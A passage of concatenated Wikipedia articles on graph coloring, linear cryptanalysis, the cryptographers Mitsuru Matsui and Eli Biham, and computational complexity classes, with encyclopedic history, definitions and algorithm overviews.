colors but not on what they are. Graph coloring enjoys many practical applications as well as theoretical challenges. Beside the classical types of problems, different limitations can also be set on the graph, or on the way a color is assigned, or even on the color itself. It has even reached popularity with the general public in the form of the popular number puzzleSudoku. Graph coloring is still a very active field of research. Note: Many terms used in this article are defined inGlossary of graph theory. The first results about graph coloring deal almost exclusively withplanar graphsin the form ofmap coloring. While trying to color a map of the counties of England,Francis Guthriepostulated thefour color conjecture, noting that four colors were sufficient to color the map so that no regions sharing a common border received the same color. Guthrie's brother passed on the question to his mathematics teacherAugustus De MorganatUniversity College, who mentioned it in a letter toWilliam Hamiltonin 1852.Arthur Cayleyraised the problem at a meeting of theLondon Mathematical Societyin 1879. The same year,Alfred Kempepublished a paper that claimed to establish the result, and for a decade the four color problem was considered solved. For his accomplishment Kempe was elected a Fellow of theRoyal Societyand later President of the London Mathematical Society.[1] In 1890,Percy John Heawoodpointed out that Kempe's argument was wrong. However, in that paper he proved thefive color theorem, saying that every planar map can be colored with no more thanfivecolors, using ideas of Kempe. In the following century, a vast amount of work was done and theories were developed to reduce the number of colors to four, until the four color theorem was finally proved in 1976 byKenneth AppelandWolfgang Haken. The proof went back to the ideas of Heawood and Kempe and largely disregarded the intervening developments.[2]The proof of the four color theorem is noteworthy, aside from its solution of a century-old problem, for being the first major computer-aided proof. In 1912,George David Birkhoffintroduced thechromatic polynomialto study the coloring problem, which was generalised to theTutte polynomialbyW. T. Tutte, both of which are important invariants inalgebraic graph theory. Kempe had already drawn attention to the general, non-planar case in 1879,[3]and many results on generalisations of planar graph coloring to surfaces of higher order followed in the early 20th century. In 1960,Claude Bergeformulated another conjecture about graph coloring, thestrong perfect graph conjecture, originally motivated by aninformation-theoreticconcept called thezero-error capacityof a graph introduced byShannon. The conjecture remained unresolved for 40 years, until it was established as the celebratedstrong perfect graph theorembyChudnovsky,Robertson,Seymour, andThomasin 2002. Graph coloring has been studied as an algorithmic problem since the early 1970s: the chromatic number problem (see section§ Vertex coloringbelow) is one ofKarp's 21 NP-complete problemsfrom 1972, and at approximately the same time various exponential-time algorithms were developed based on backtracking and on the deletion-contraction recurrence ofZykov (1949). One of the major applications of graph coloring,register allocationin compilers, was introduced in 1981. When used without any qualification, acoloringof a graph almost always refers to aproper vertex coloring, namely a labeling of the graph's vertices with colors such that no two vertices sharing the sameedgehave the same color. Since a vertex with aloop(i.e. a connection directly back to itself) could never be properly colored, it is understood that graphs in this context are loopless. The terminology of usingcolorsfor vertex labels goes back to map coloring. Labels likeredandblueare only used when the number of colors is small, and normally it is understood that the labels are drawn from theintegers{1, 2, 3, ...}. A coloring using at mostkcolors is called a (proper)k-coloring. The smallest number of colors needed to color a graphGis called itschromatic number, and is often denotedχ(G).[4]Sometimesγ(G)is used, sinceχ(G)is also used to denote theEuler characteristicof a graph.[5]A graph that can be assigned a (proper)k-coloring isk-colorable, and it isk-chromaticif its chromatic number is exactlyk. A subset of vertices assigned to the same color is called acolor class; every such class forms anindependent set. Thus, ak-coloring is the same as a partition of the vertex set intokindependent sets, and the termsk-partiteandk-colorablehave the same meaning. Thechromatic polynomialcounts the number of ways a graph can be colored using some of a given number of colors. For example, using three colors, the graph in the adjacent image can be colored in 12 ways. With only two colors, it cannot be colored at all. With four colors, it can be colored in 24 + 4 × 12 = 72 ways: using all four colors, there are 4! = 24 valid colorings (everyassignment of four colors toany4-vertex graph is a proper coloring); and for every choice of three of the four colors, there are 12 valid 3-colorings. So, for the graph in the example, a table of the number of valid colorings would start like this: The chromatic polynomial is a functionP(G,t)that counts the number oft-colorings ofG. As the name indicates, for a givenGthe function is indeed apolynomialint. For the example graph,P(G,t) =t(t− 1)2(t− 2), and indeedP(G, 4) = 72. The chromatic polynomial includes more information about the colorability ofGthan does the chromatic number. Indeed,χis the smallest positive integer that is not a zero of the chromatic polynomialχ(G) = min{k:P(G,k) > 0}. Anedge coloringof a graph is a proper coloring of theedges, meaning an assignment of colors to edges so that no vertex is incident to two edges of the same color. An edge coloring withkcolors is called ak-edge-coloring and is equivalent to the problem of partitioning the edge set intokmatchings. The smallest number of colors needed for an edge coloring of a graphGis thechromatic index, oredge chromatic number,χ′(G). ATait coloringis a 3-edge coloring of acubic graph. Thefour color theoremis equivalent to the assertion that every planar cubicbridgelessgraph admits a Tait coloring. Total coloringis a type of coloring on the verticesandedges of a graph. When used without any qualification, a total coloring is always assumed to be proper in the sense that no adjacent vertices, no adjacent edges, and no edge and its end-vertices are assigned the same color. The total chromatic numberχ″(G)of a graphGis the fewest colors needed in any total coloring ofG. For a graph with a strong embedding on a surface, theface coloringis the dual of the vertex coloring problem. For a graphGwith a strong embedding on an orientable surface,William T. Tutte[6][7][8]discovered that if the graph isk-face-colorable thenGadmits a nowhere-zerok-flow. The equivalence holds if the surface is sphere. Anunlabeled coloringof a graph is anorbitof a coloring under the action of theautomorphism groupof the graph. The colors remain labeled; it is the graph that is unlabeled. There is an analogue of thechromatic polynomialwhich counts the number of unlabeled colorings of a graph from a given finite color set. If we interpret a coloring of a graph ondvertices as a vector in⁠Zd{\displaystyle \mathbb {Z} ^{d}}⁠, the action of an automorphism is apermutationof the coefficients in the coloring vector. Assigning distinct colors to distinct vertices always yields a proper coloring, so The only graphs that can be 1-colored areedgeless graphs. Acomplete graphKn{\displaystyle K_{n}}ofnvertices requiresχ(Kn)=n{\displaystyle \chi (K_{n})=n}colors. In an optimal coloring there must be at least one of the graph'smedges between every pair of color classes, so More generally a familyF{\displaystyle {\mathcal {F}}}of graphs isχ-boundedif there is some functionc{\displaystyle c}such that the graphsG{\displaystyle G}inF{\displaystyle {\mathcal {F}}}can be colored with at mostc(ω(G)){\displaystyle c(\omega (G))}colors, whereω(G){\displaystyle \omega (G)}is theclique numberofG{\displaystyle G}. For the family of the perfect graphs this function isc(ω(G))=ω(G){\displaystyle c(\omega (G))=\omega (G)}. The 2-colorable graphs are exactly thebipartite graphs, includingtreesand forests. By the four color theorem, every planar graph can be 4-colored. Agreedy coloringshows that every graph can be colored with one more color than the maximum vertexdegree, Complete graphs haveχ(G)=n{\displaystyle \chi (G)=n}andΔ(G)=n−1{\displaystyle \Delta (G)=n-1}, andodd cycleshaveχ(G)=3{\displaystyle \chi (G)=3}andΔ(G)=2{\displaystyle \Delta (G)=2}, so for these graphs this bound is best possible. In all other cases, the bound can be slightly improved;Brooks' theorem[9]states that Several lower bounds for the chromatic bounds have been discovered over the years: IfGcontains acliqueof sizek, then at leastkcolors are needed to color that clique; in other words, the chromatic number is at least the clique number: Forperfect graphsthis bound is tight. Finding cliques is known as theclique problem. Hoffman's bound:LetW{\displaystyle W}be a real symmetric matrix such thatWi,j=0{\displaystyle W_{i,j}=0}whenever(i,j){\displaystyle (i,j)}is not an edge inG{\displaystyle G}. DefineχW(G)=1−λmax(W)λmin(W){\displaystyle \chi _{W}(G)=1-{\tfrac {\lambda _{\max }(W)}{\lambda _{\min }(W)}}}, whereλmax(W),λmin(W){\displaystyle \lambda _{\max }(W),\lambda _{\min }(W)}are the largest and smallest eigenvalues ofW{\displaystyle W}. DefineχH(G)=maxWχW(G){\textstyle \chi _{H}(G)=\max _{W}\chi _{W}(G)}, withW{\displaystyle W}as above. Then: Vector chromatic number:LetW{\displaystyle W}be a positive semi-definite matrix such thatWi,j≤−1k−1{\displaystyle W_{i,j}\leq -{\tfrac {1}{k-1}}}whenever(i,j){\displaystyle (i,j)}is an edge inG{\displaystyle G}. DefineχV(G){\displaystyle \chi _{V}(G)}to be the least k for which such a matrixW{\displaystyle W}exists. Then Lovász number:The Lovász number of a complementary graph is also a lower bound on the chromatic number: Fractional chromatic number:The fractional chromatic number of a graph is a lower bound on the chromatic number as well: These bounds are ordered as follows: Graphs with largecliqueshave a high chromatic number, but the opposite is not true. TheGrötzsch graphis an example of a 4-chromatic graph without a triangle, and the example can be generalized to theMycielskians. To prove this, both, Mycielski and Zykov, each gave a construction of an inductively defined family oftriangle-free graphsbut with arbitrarily large chromatic number.[11]Burling (1965)constructed axis aligned boxes inR3{\displaystyle \mathbb {R} ^{3}}whoseintersection graphis triangle-free and requires arbitrarily many colors to be properly colored. This family of graphs is then called the Burling graphs. The same class of graphs is used for the construction of a family of triangle-free line segments in the plane, given by Pawlik et al. (2014).[12]It shows that the chromatic number of its intersection graph is arbitrarily large as well. Hence, this implies that axis aligned boxes inR3{\displaystyle \mathbb {R} ^{3}}as well as line segments inR2{\displaystyle \mathbb {R} ^{2}}are notχ-bounded.[12] From Brooks's theorem, graphs with high chromatic number must have high maximum degree. But colorability is not an entirely local phenomenon: A graph with highgirthlooks locally like a tree, because all cycles are long, but its chromatic number need not be 2: An edge coloring ofGis a vertex coloring of itsline graphL(G){\displaystyle L(G)}, and vice versa. Thus, There is a strong relationship between edge colorability and the graph's maximum degreeΔ(G){\displaystyle \Delta (G)}. Since all edges incident to the same vertex need their own color, we have Moreover, In general, the relationship is even stronger than what Brooks's theorem gives for vertex coloring: A graph has ak-coloring if and only if it has anacyclic orientationfor which thelongest pathhas length at mostk; this is theGallai–Hasse–Roy–Vitaver theorem(Nešetřil & Ossona de Mendez 2012). For planar graphs, vertex colorings are essentially dual tonowhere-zero flows. About infinite graphs, much less is known. The following are two of the few results about infinite graph coloring: As stated above,ω(G)≤χ(G)≤Δ(G)+1.{\displaystyle \omega (G)\leq \chi (G)\leq \Delta (G)+1.}A conjecture of Reed from 1998 is that the value is essentially closer to the lower bound,χ(G)≤⌈ω(G)+Δ(G)+12⌉.{\displaystyle \chi (G)\leq \left\lceil {\frac {\omega (G)+\Delta (G)+1}{2}}\right\rceil .} Thechromatic number of the plane, where two points are adjacent if they have unit distance, is unknown, although it is one of 5, 6, or 7. Otheropen problemsconcerning the chromatic number of graphs include theHadwiger conjecturestating that every graph with chromatic numberkhas acomplete graphonkvertices as aminor, theErdős–Faber–Lovász conjecturebounding the chromatic number of unions of complete graphs that have at most one vertex in common to each pair, and theAlbertson conjecturethat amongk-chromatic graphs the complete graphs are the ones with smallestcrossing number. When Birkhoff and Lewis introduced the chromatic polynomial in their attack on the four-color theorem, they conjectured that for planar graphsG, the polynomialP(G,t){\displaystyle P(G,t)}has no zeros in the region[4,∞){\displaystyle [4,\infty )}. Although it is known that such a chromatic polynomial has no zeros in the region[5,∞){\displaystyle [5,\infty )}and thatP(G,4)≠0{\displaystyle P(G,4)\neq 0}, their conjecture is still unresolved. It also remains an unsolved problem to characterize graphs which have the same chromatic polynomial and to determine which polynomials are chromatic. Determining if a graph can be colored with 2 colors is equivalent to determining whether or not the graph isbipartite, and thus computable inlinear timeusingbreadth-first searchordepth-first search. More generally, the chromatic number and a corresponding coloring ofperfect graphscan be computed inpolynomial timeusingsemidefinite programming.Closed formulasfor chromatic polynomials are known for many classes of graphs, such as forests, chordal graphs, cycles, wheels, and ladders, so these can be evaluated in polynomial time. If the graph is planar and has low branch-width (or is nonplanar but with a knownbranch-decomposition), then it can be solved in polynomial time using dynamic programming. In general, the time required is polynomial in the graph size, but exponential in the branch-width. Brute-force searchfor ak-coloring considers each of thekn{\displaystyle k^{n}}assignments ofkcolors tonvertices and checks for each if it is legal. To compute the chromatic number and the chromatic polynomial, this procedure is used for everyk=1,…,n−1{\displaystyle k=1,\ldots ,n-1}, impractical for all but the smallest input graphs. Usingdynamic programmingand a bound on the number ofmaximal independent sets,k-colorability can be decided in time and spaceO(2.4423n){\displaystyle O(2.4423^{n})}.[15]Using the principle ofinclusion–exclusionandYates's algorithm for the fast zeta transform,k-colorability can be decided in timeO(2nn){\displaystyle O(2^{n}n)}[14][16][17][18]for anyk. Faster algorithms are known for 3- and 4-colorability, which can be decided in timeO(1.3289n){\displaystyle O(1.3289^{n})}[19]andO(1.7272n){\displaystyle O(1.7272^{n})},[20]respectively. Exponentially faster algorithms are also known for 5- and 6-colorability, as well as for restricted families of graphs, including sparse graphs.[21] ThecontractionG/uv{\displaystyle G/uv}of a graphGis the graph obtained by identifying the verticesuandv, and removing any edges between them. The remaining edges originally incident touorvare now incident to their identification (i.e., the new fused nodeuv). This operation plays a major role in the analysis of graph coloring. The chromatic number satisfies therecurrence relation: due toZykov (1949), whereuandvare non-adjacent vertices, andG+uv{\displaystyle G+uv}is the graph with the edgeuvadded. Several algorithms are based on evaluating this recurrence and the resulting computation tree is sometimes called a Zykov tree. The running time is based on a heuristic for choosing the verticesuandv. The chromatic polynomial satisfies the following recurrence relation whereuandvare adjacent vertices, andG−uv{\displaystyle G-uv}is the graph with the edgeuvremoved.P(G−uv,k){\displaystyle P(G-uv,k)}represents the number of possible proper colorings of the graph, where the vertices may have the same or different colors. Then the proper colorings arise from two different graphs. To explain, if the verticesuandvhave different colors, then we might as well consider a graph whereuandvare adjacent. Ifuandvhave the same colors, we might as well consider a graph whereuandvare contracted. Tutte's curiosity about which other graph properties satisfied this recurrence led him to discover a bivariate generalization of the chromatic polynomial, theTutte polynomial. These expressions give rise to a recursive procedure called thedeletion–contraction algorithm, which forms the basis of many algorithms for graph coloring. The running time satisfies the same recurrence relation as theFibonacci numbers, so in the worst case the algorithm runs in time within a polynomial factor of(1+52)n+m=O(1.6180n+m){\displaystyle \left({\tfrac {1+{\sqrt {5}}}{2}}\right)^{n+m}=O(1.6180^{n+m})}fornvertices andmedges.[22]The analysis can be improved to within a polynomial factor of the numbert(G){\displaystyle t(G)}ofspanning treesof the input graph.[23]In practice,branch and boundstrategies andgraph isomorphismrejection are employed to avoid some recursive calls. The running time depends on the heuristic used to pick the vertex pair. Thegreedy algorithmconsiders the vertices in a specific orderv1{\displaystyle v_{1}}, ...,vn{\displaystyle v_{n}}and assigns tovi{\displaystyle v_{i}}the smallest available color not used byvi{\displaystyle v_{i}}'s neighbours amongv1{\displaystyle v_{1}}, ...,vi−1{\displaystyle v_{i-1}}, adding a fresh color if needed. The quality of the resulting coloring depends on the chosen ordering. There exists an ordering that leads to a greedy coloring with the optimal number ofχ(G){\displaystyle \chi (G)}colors. On the other hand, greedy colorings can be arbitrarily bad; for example, thecrown graphonnvertices can be 2-colored, but has an ordering that leads to a greedy coloring withn/2{\displaystyle n/2}colors. Forchordal graphs, and for special cases of chordal graphs such asinterval graphsandindifference graphs, the greedy coloring algorithm can be used to find optimal colorings in polynomial time, by choosing the vertex ordering to be the reverse of aperfect elimination orderingfor the graph. Theperfectly orderable graphsgeneralize this property, but it is NP-hard to find a perfect ordering of these graphs. If the vertices are ordered according to theirdegrees, the resulting greedy coloring uses at mostmaximin{d(xi)+1,i}{\displaystyle {\text{max}}_{i}{\text{ min}}\{d(x_{i})+1,i\}}colors, at most one more than the graph's maximum degree. This heuristic is sometimes called the Welsh–Powell algorithm.[24]Another heuristic due toBrélazestablishes the ordering dynamically while the algorithm proceeds, choosing next the vertex adjacent to the largest number of different colors.[25]Many other graph coloring heuristics are similarly based on greedy coloring for a specific static or dynamic strategy of ordering the vertices, these algorithms are sometimes calledsequential coloringalgorithms. The maximum (worst) number of colors that can be obtained by the greedy algorithm, by using a vertex ordering chosen to maximize this number, is called theGrundy numberof a graph. Two well-known polynomial-time heuristics for graph colouring are theDSaturandrecursive largest first(RLF) algorithms. Similarly to thegreedy colouring algorithm, DSatur colours theverticesof agraphone after another, expending a previously unused colour when needed. Once a newvertexhas been coloured, the algorithm determines which of the remaining uncoloured vertices has the highest number of different colours in its neighbourhood and colours this vertex next. This is defined as thedegree of saturationof a given vertex. Therecursive largest first algorithmoperates in a different fashion by constructing each color class one at a time. It does this by identifying amaximal independent setof vertices in the graph using specialised heuristic rules. It then assigns these vertices to the same color and removes them from the graph. These actions are repeated on the remaining subgraph until no vertices remain. The worst-case complexity of DSatur isO(n2){\displaystyle O(n^{2})}, wheren{\displaystyle n}is the number of vertices in the graph. The algorithm can also be implemented using a binary heap to store saturation degrees, operating inO((n+m)log⁡n){\displaystyle O((n+m)\log n)}wherem{\displaystyle m}is the number of edges in the graph.[26]This produces much faster runs with sparse graphs. The overall complexity of RLF is slightly higher thanDSaturatO(mn){\displaystyle O(mn)}.[26] DSatur and RLF areexactforbipartite,cycle, andwheel graphs.[26] It is known that aχ-chromatic graph can bec-colored in the deterministic LOCAL model, inO(n1/α){\displaystyle O(n^{1/\alpha })}. rounds, withα=⌊c−1χ−1⌋{\displaystyle \alpha =\left\lfloor {\frac {c-1}{\chi -1}}\right\rfloor }. A matching lower bound ofΩ(n1/α){\displaystyle \Omega (n^{1/\alpha })}rounds is also known. This lower bound holds even if quantum computers that can exchange quantum information, possibly with a pre-shared entangled state, are allowed. In the field ofdistributed algorithms, graph coloring is closely related to the problem ofsymmetry breaking. The current state-of-the-art randomized algorithms are faster for sufficiently large maximum degree Δ than deterministic algorithms. The fastest randomized algorithms employ themulti-trials techniqueby Schneider and Wattenhofer.[27] In asymmetric graph, adeterministicdistributed algorithm cannot find a proper vertex coloring. Some auxiliary information is needed in order to break symmetry. A standard assumption is that initially each node has aunique identifier, for example, from the set {1, 2, ...,n}. Put otherwise, we assume that we are given ann-coloring. The challenge is toreducethe number of colors fromnto, e.g., Δ + 1. The more colors are employed, e.g.O(Δ) instead of Δ + 1, the fewer communication rounds are required.[27] A straightforward distributed version of the greedy algorithm for (Δ + 1)-coloring requires Θ(n) communication rounds in the worst case – information may need to be propagated from one side of the network to another side. The simplest interesting case is ann-cycle. Richard Cole andUzi Vishkin[28]show that there is a distributed algorithm that reduces the number of colors fromntoO(logn) in one synchronous communication step. By iterating the same procedure, it is possible to obtain a 3-coloring of ann-cycle inO(log*n) communication steps (assuming that we have unique node identifiers). The functionlog*,iterated logarithm, is an extremely slowly growing function, "almost constant". Hence the result by Cole and Vishkin raised the question of whether there is aconstant-timedistributed algorithm for 3-coloring ann-cycle.Linial (1992)showed that this is not possible: any deterministic distributed algorithm requires Ω(log*n) communication steps to reduce ann-coloring to a 3-coloring in ann-cycle. The technique by Cole and Vishkin can be applied in arbitrary bounded-degree graphs as well; the running time is poly(Δ) +O(log*n).[29]The technique was extended tounit disk graphsby Schneider and Wattenhofer.[30]The fastest deterministic algorithms for (Δ + 1)-coloring for small Δ are due to Leonid Barenboim, Michael Elkin and Fabian Kuhn.[31]The algorithm by Barenboim et al. runs in timeO(Δ) +log*(n)/2, which is optimal in terms ofnsince the constant factor 1/2 cannot be improved due to Linial's lower bound.Panconesi & Srinivasan (1996)use network decompositions to compute a Δ+1 coloring in time2O(log⁡n){\displaystyle 2^{O\left({\sqrt {\log n}}\right)}}. The problem of edge coloring has also been studied in the distributed model.Panconesi & Rizzi (2001)achieve a (2Δ − 1)-coloring inO(Δ +log*n) time in this model. The lower bound for distributed vertex coloring due toLinial (1992)applies to the distributed edge coloring problem as well. Decentralized algorithms are ones where nomessage passingis allowed (in contrast to distributed algorithms where local message passing takes places), and efficient decentralized algorithms exist that will color a graph if a proper coloring exists. These assume that a vertex is able to sense whether any of its neighbors are using the same color as the vertex i.e., whether a local conflict exists. This is a mild assumption in many applications e.g. in wireless channel allocation it is usually reasonable to assume that a station will be able to detect whether other interfering transmitters are using the same channel (e.g. by measuring the SINR). This sensing information is sufficient to allow algorithms based on learning automata to find a proper graph coloring with probability one.[32] Graph coloring is computationally hard. It isNP-completeto decide if a given graph admits ak-coloring for a givenkexcept for the casesk∈ {0,1,2}. In particular, it is NP-hard to compute the chromatic number.[33]The 3-coloring problem remains NP-complete even on 4-regularplanar graphs.[34]On graphs with maximal degree 3 or less, however,Brooks' theoremimplies that the 3-coloring problem can be solved in linear time. Further, for everyk> 3, ak-coloring of a planar graph exists by thefour color theorem, and it is possible to find such a coloring in polynomial time. However, finding thelexicographicallysmallest 4-coloring of a planar graph is NP-complete.[35] The best knownapproximation algorithmcomputes a coloring of size at most within a factorO(n(log logn)2(log n)−3) of the chromatic number.[36]For allε> 0, approximating the chromatic number withinn1−εisNP-hard.[37] It is also NP-hard to color a 3-colorable graph with 5 colors,[38]4-colorable graph with 7 colours,[38]and ak-colorable graph with(k⌊k/2⌋)−1{\displaystyle \textstyle {\binom {k}{\lfloor k/2\rfloor }}-1}colors fork≥ 5.[39] Computing the coefficients of the chromatic polynomial is♯P-hard. In fact, even computing the value ofχ(G,k){\displaystyle \chi (G,k)}is ♯P-hard at anyrational pointkexcept fork= 1 andk= 2.[40]There is noFPRASfor evaluating the chromatic polynomial at any rational pointk≥ 1.5 except fork= 2 unlessNP=RP.[41] For edge coloring, the proof of Vizing's result gives an algorithm that uses at most Δ+1 colors. However, deciding between the two candidate values for the edge chromatic number is NP-complete.[42]In terms of approximation algorithms, Vizing's algorithm shows that the edge chromatic number can be approximated to within 4/3, and the hardness result shows that no (4/3 −ε)-algorithm exists for anyε > 0unlessP = NP. These are among the oldest results in the literature of approximation algorithms, even though neither paper makes explicit use of that notion.[43] Vertex coloring models to a number ofscheduling problems.[44]In the cleanest form, a given set of jobs need to be assigned to time slots, each job requires one such slot. Jobs can be scheduled in any order, but pairs of jobs may be inconflictin the sense that they may not be assigned to the same time slot, for example because they both rely on a shared resource. The corresponding graph contains a vertex for every job and an edge for every conflicting pair of jobs. The chromatic number of the graph is exactly the minimummakespan, the optimal time to finish all jobs without conflicts. Details of the scheduling problem define the structure of the graph. For example, when assigning aircraft to flights, the resulting conflict graph is aninterval graph, so the coloring problem can be solved efficiently. Inbandwidth allocationto radio stations, the resulting conflict graph is aunit disk graph, so the coloring problem is 3-approximable. Acompileris acomputer programthat translates onecomputer languageinto another. To improve the execution time of the resulting code, one of the techniques ofcompiler optimizationisregister allocation, where the most frequently used values of the compiled program are kept in the fastprocessor registers. Ideally, values are assigned to registers so that they can all reside in the registers when they are used. The textbook approach to this problem is to model it as a graph coloring problem.[45]The compiler constructs aninterference graph, where vertices are variables and an edge connects two vertices if they are needed at the same time. If the graph can be colored withkcolors then any set of variables needed at the same time can be stored in at mostkregisters. The problem of coloring a graph arises in many practical areas such as sports scheduling,[46]designing seating plans,[47]exam timetabling,[48]the scheduling of taxis,[49]and solvingSudokupuzzles.[50] An important class ofimpropercoloring problems is studied inRamsey theory, where the graph's edges are assigned to colors, and there is no restriction on the colors of incident edges. A simple example is thetheorem on friends and strangers, which states that in any coloring of the edges ofK6{\displaystyle K_{6}}, the complete graph of six vertices, there will be a monochromatic triangle; often illustrated by saying that any group of six people either has three mutual strangers or three mutual acquaintances. Ramsey theory is concerned with generalisations of this idea to seek regularity amid disorder, finding general conditions for the existence of monochromatic subgraphs with given structure. Modular coloring is a type of graph coloring in which the color of each vertex is the sum of the colors of its adjacent vertices. Letk ≥ 2be a number of colors whereZk{\displaystyle \mathbb {Z} _{k}}is the set of integers modulo k consisting of the elements (or colors)0,1,2, ..., k-2, k-1. First, we color each vertex in G using the elements ofZk{\displaystyle \mathbb {Z} _{k}}, allowing two adjacent vertices to be assigned the same color. In other words, we want c to be a coloring such that c: V(G) →Zk{\displaystyle \mathbb {Z} _{k}}where adjacent vertices can be assigned the same color. For each vertex v in G, the color sum ofv, σ(v), is the sum of all of the adjacent vertices to v mod k. The color sum of v is denoted by where u is an arbitrary vertex in the neighborhood of v, N(v). We then color each vertex with the new coloring determined by the sum of the adjacent vertices. The graph G has a modular k-coloring if, for every pair of adjacent vertices a,b, σ(a) ≠ σ(b). The modular chromatic number of G, mc(G), is the minimum value of k such that there exists a modular k-coloring of G.< For example, let there be a vertex v adjacent to vertices with the assigned colors 0, 1, 1, and 3 mod 4 (k=4). The color sum would be σ(v) = 0 + 1 + 1+ 3 mod 4 = 5 mod 4 = 1. This would be the new color of vertex v. We would repeat this process for every vertex in G. If two adjacent vertices have equal color sums, G does not have a modulo 4 coloring. If none of the adjacent vertices have equal color sums, G has a modulo 4 coloring. Coloring can also be considered forsigned graphsandgain graphs.
https://en.wikipedia.org/wiki/Graph_coloring
Incryptography,linear cryptanalysisis a general form ofcryptanalysisbased on findingaffineapproximations to the action of acipher. Attacks have been developed forblock ciphersandstream ciphers. Linear cryptanalysis is one of the two most widely used attacks on block ciphers; the other beingdifferential cryptanalysis. The discovery is attributed toMitsuru Matsui, who first applied the technique to theFEALcipher (Matsui and Yamagishi, 1992).[1]Subsequently, Matsui published an attack on theData Encryption Standard(DES), eventually leading to the first experimental cryptanalysis of the cipher reported in the open community (Matsui, 1993; 1994).[2][3]The attack on DES is not generally practical, requiring 247known plaintexts.[3] A variety of refinements to the attack have been suggested, including using multiple linear approximations or incorporating non-linear expressions, leading to a generalizedpartitioning cryptanalysis. Evidence of security against linear cryptanalysis is usually expected of new cipher designs. There are two parts to linear cryptanalysis. The first is to construct linear equations relating plaintext, ciphertext and key bits that have a high bias; that is, whose probabilities of holding (over the space of all possible values of their variables) are as close as possible to 0 or 1. The second is to use these linear equations in conjunction with known plaintext-ciphertext pairs to derive key bits. For the purposes of linear cryptanalysis, a linear equation expresses the equality of two expressions which consist of binary variables combined with the exclusive-or (XOR) operation. For example, the following equation, from a hypothetical cipher, states the XOR sum of the first and third plaintext bits (as in a block cipher's block) and the first ciphertext bit is equal to the second bit of the key: In an ideal cipher, any linear equation relating plaintext, ciphertext and key bits would hold with probability 1/2. Since the equations dealt with in linear cryptanalysis will vary in probability, they are more accurately referred to as linearapproximations. The procedure for constructing approximations is different for each cipher. In the most basic type of block cipher, asubstitution–permutation network, analysis is concentrated primarily on theS-boxes, the only nonlinear part of the cipher (i.e. the operation of an S-box cannot be encoded in a linear equation). For small enough S-boxes, it is possible to enumerate every possible linear equation relating the S-box's input and output bits, calculate their biases and choose the best ones. Linear approximations for S-boxes then must be combined with the cipher's other actions, such as permutation and key mixing, to arrive at linear approximations for the entire cipher. Thepiling-up lemmais a useful tool for this combination step. There are also techniques for iteratively improving linear approximations (Matsui 1994). Having obtained a linear approximation of the form: we can then apply a straightforward algorithm (Matsui's Algorithm 2), using known plaintext-ciphertext pairs, to guess at the values of the key bits involved in the approximation. For each set of values of the key bits on the right-hand side (referred to as apartial key), count how many times the approximation holds true over all the known plaintext-ciphertext pairs; call this countT. The partial key whoseThas the greatestabsolute differencefrom half the number of plaintext-ciphertext pairs is designated as the most likely set of values for those key bits. This is because it is assumed that the correct partial key will cause the approximation to hold with a high bias. The magnitude of the bias is significant here, as opposed to the magnitude of the probability itself. This procedure can be repeated with other linear approximations, obtaining guesses at values of key bits, until the number of unknown key bits is low enough that they can be attacked withbrute force.
https://en.wikipedia.org/wiki/Linear_cryptanalysis
Mitsuru Matsui(松井 充,Matsui Mitsuru, born September 16, 1961)is a Japanesecryptographerand senior researcher forMitsubishi ElectricCompany. While researching error-correcting codes in 1990, Matsui was inspired byEli BihamandAdi Shamir'sdifferential cryptanalysis, and discovered the technique oflinear cryptanalysis, published in 1993. Differential and linear cryptanalysis are the two major general techniques known for thecryptanalysisofblock ciphers. The following year, Matsui was the first to publicly report an experimental cryptanalysis ofDES, using the computing power of twelveworkstationsover a period of fifty days. He is also the author of theMISTY-1andMISTY-2block ciphers, and contributed to the design ofCamelliaandKASUMI. For his achievements, Matsui got the 2012RSA Conference Award for Excellence in Mathematics. This article about a cryptographer is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Mitsuru_Matsui
Eli Biham(Hebrew:אלי ביהם) is an Israelicryptographerandcryptanalystwho is a professor at theTechnion - Israel Institute of TechnologyComputer Science department. From 2008 to 2013, Biham was thedeanof the Technion Computer Science department, after serving for two years as chief of CS graduate school. Biham invented (publicly)differential cryptanalysis,[1]for which he received his Ph.D., while working underAdi Shamir. Biham has taken part in the design of several new cryptographic primitives:
https://en.wikipedia.org/wiki/Eli_Biham
Incomputational complexity theory, acomplexity classis asetofcomputational problems"of related resource-basedcomplexity".[1]The two most commonly analyzed resources aretimeandmemory. In general, a complexity class is defined in terms of a type of computational problem, amodel of computation, and a bounded resource liketimeormemory. In particular, most complexity classes consist ofdecision problemsthat are solvable with aTuring machine, and are differentiated by their time or space (memory) requirements. For instance, the classPis the set of decision problems solvable by a deterministic Turing machine inpolynomial time. There are, however, many complexity classes defined in terms of other types of problems (e.g.counting problemsandfunction problems) and using other models of computation (e.g.probabilistic Turing machines,interactive proof systems,Boolean circuits, andquantum computers). The study of the relationships between complexity classes is a major area of research intheoretical computer science. There are often general hierarchies of complexity classes; for example, it is known that a number of fundamental time and space complexity classes relate to each other in the following way:L⊆NL⊆P⊆NP⊆PSPACE⊆EXPTIME⊆NEXPTIME⊆EXPSPACE(where ⊆ denotes thesubsetrelation). However, many relationships are not yet known; for example, one of the most famousopen problemsin computer science concerns whetherPequalsNP. The relationships between classes often answer questions about the fundamental nature of computation. ThePversusNPproblem, for instance, is directly related to questions of whethernondeterminismadds any computational power to computers and whether problems having solutions that can be quickly checked for correctness can also be quickly solved. Complexity classes aresetsof relatedcomputational problems. They are defined in terms of the computational difficulty of solving the problems contained within them with respect to particular computational resources like time or memory. More formally, the definition of a complexity class consists of three things: a type of computational problem, a model of computation, and a bounded computational resource. In particular, most complexity classes consist ofdecision problemsthat can be solved by aTuring machinewith boundedtimeorspaceresources. For example, the complexity classPis defined as the set ofdecision problemsthat can be solved by adeterministic Turing machineinpolynomial time. Intuitively, acomputational problemis just a question that can be solved by analgorithm. For example, "is thenatural numbern{\displaystyle n}prime?" is a computational problem. A computational problem is mathematically represented as thesetof answers to the problem. In the primality example, the problem (call itPRIME{\displaystyle {\texttt {PRIME}}}) is represented by the set of all natural numbers that are prime:PRIME={n∈N|nis prime}{\displaystyle {\texttt {PRIME}}=\{n\in \mathbb {N} |n{\text{ is prime}}\}}. In the theory of computation, these answers are represented asstrings; for example, in the primality example the natural numbers could be represented as strings ofbitsthat representbinary numbers. For this reason, computational problems are often synonymously referred to as languages, since strings of bits representformal languages(a concept borrowed fromlinguistics); for example, saying that thePRIME{\displaystyle {\texttt {PRIME}}}problem is in the complexity classPis equivalent to saying that the languagePRIME{\displaystyle {\texttt {PRIME}}}is inP. The most commonly analyzed problems in theoretical computer science aredecision problems—the kinds of problems that 